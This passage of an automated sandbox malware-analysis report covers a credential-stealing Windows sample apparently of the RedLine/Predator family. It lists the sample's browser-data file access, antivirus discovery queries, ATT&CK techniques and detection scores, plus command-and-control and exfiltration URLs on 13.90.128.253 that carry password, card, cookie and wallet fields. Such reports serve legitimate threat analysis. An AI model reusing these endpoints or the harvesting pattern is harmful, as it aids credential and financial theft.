                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Zip.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeQueries volume information: C:\Users\user\AppData\Local\Temp\update_222410.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeQueries volume information: C:\Users\user\AppData\Local\Temp\update_222410.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: nwY3YpWQVx.exe, 00000000.00000002.573409001.000000001B8ED000.00000004.00000020.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.574213158.000000001B9BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Predator
                  Source: Yara matchFile source: nwY3YpWQVx.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.695ae8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.630000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.632203.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.update_222410.exe.12bb0ca8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.update_222410.exe.12b4cdc0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.294533919.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.397751643.0000000012B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nwY3YpWQVx.exe PID: 5996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: update_222410.exe PID: 3964, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: Yara matchFile source: nwY3YpWQVx.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.695ae8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.630000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.632203.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.update_222410.exe.12bb0ca8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.update_222410.exe.12b4cdc0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.294533919.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.397751643.0000000012B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nwY3YpWQVx.exe PID: 5996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: update_222410.exe PID: 3964, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Predator
                  Source: Yara matchFile source: nwY3YpWQVx.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.695ae8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.630000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.632203.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.update_222410.exe.12bb0ca8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.update_222410.exe.12b4cdc0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.294533919.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.397751643.0000000012B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nwY3YpWQVx.exe PID: 5996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: update_222410.exe PID: 3964, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts21
                  Windows Management Instrumentation                  		1
                  Registry Run Keys / Startup Folder                  		11
                  Process Injection                  		11
                  Masquerading                  		1
                  OS Credential Dumping                  		131
                  Security Software Discovery                  		Remote Services1
                  Archive Collected Data                  		Exfiltration Over Other Network Medium1
                  Encrypted Channel                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  Registry Run Keys / Startup Folder                  		1
                  Disable or Modify Tools                  		LSASS Memory1
                  Process Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		Exfiltration Over Bluetooth1
                  Ingress Tool Transfer                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
                  Virtualization/Sandbox Evasion                  		Security Account Manager31
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                  Non-Application Layer Protocol                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput CaptureScheduled Transfer13
                  Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information                  		LSA Secrets1
                  Remote System Discovery                  		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common1
                  Software Packing                  		Cached Domain Credentials1
                  System Network Configuration Discovery                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  File and Directory Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
                  System Information Discovery                  		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  nwY3YpWQVx.exe88%ReversingLabsByteCode-MSIL.Trojan.RedLineStealer
                  nwY3YpWQVx.exe73%VirustotalBrowse
                  nwY3YpWQVx.exe100%AviraTR/Dropper.Gen
                  nwY3YpWQVx.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\Zip.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Zip.exe77%ReversingLabsByteCode-MSIL.Trojan.Oskistelaer
                  C:\Users\user\Desktop\Newtonsoft.Json.dll0%ReversingLabs

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  0.0.nwY3YpWQVx.exe.630000.0.unpack100%AviraTR/Dropper.GenDownload File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://ip-api.comx0%URL Reputationsafe
                  http://james.newtonking.com/projects/json0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.sakkal.comgE0%Avira URL Cloudsafe
                  http://13.90.128.253/wp-content/lock/logs.php?hwid=CH84D70FD1B3&Passwords=0&CreditCards=0&Cookies=0&0%Avira URL Cloudsafe
                  http://13.90.128.253/wp-content/lock/logs.php?hwid=CH84D70FD1B3&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=00%Avira URL Cloudsafe
                  http://13.90.128.2530%Avira URL Cloudsafe
                  http://13.90.128.2537%VirustotalBrowse
                  http://13.90.128.253/wp-content/lock0%Avira URL Cloudsafe
                  http://13.90.128.253/wp-content/lock/gate.php?hwid=CH84D70FD1B30%Avira URL Cloudsafe
                  http://ip-api.com80%Avira URL Cloudsafe
                  https://gomorrah.pw0%Avira URL Cloudsafe
                  http://13.90.128.25380%Avira URL Cloudsafe
                  http://www.ascendercorp.com/typedesigners.htmlha0%Avira URL Cloudsafe
                  http://13.90.128.253/wp-content/lock/task.php?hwid=CH84D70FD1B30%Avira URL Cloudsafe
                  http://www.ascendercorp.com/typedesigners.html)a0%Avira URL Cloudsafe
                  http://13.90.128.253x0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ip-api.com
                  		208.95.112.1
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://13.90.128.253/wp-content/lock/logs.php?hwid=CH84D70FD1B3&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0true
                    • Avira URL Cloud: safe
                    		unknown
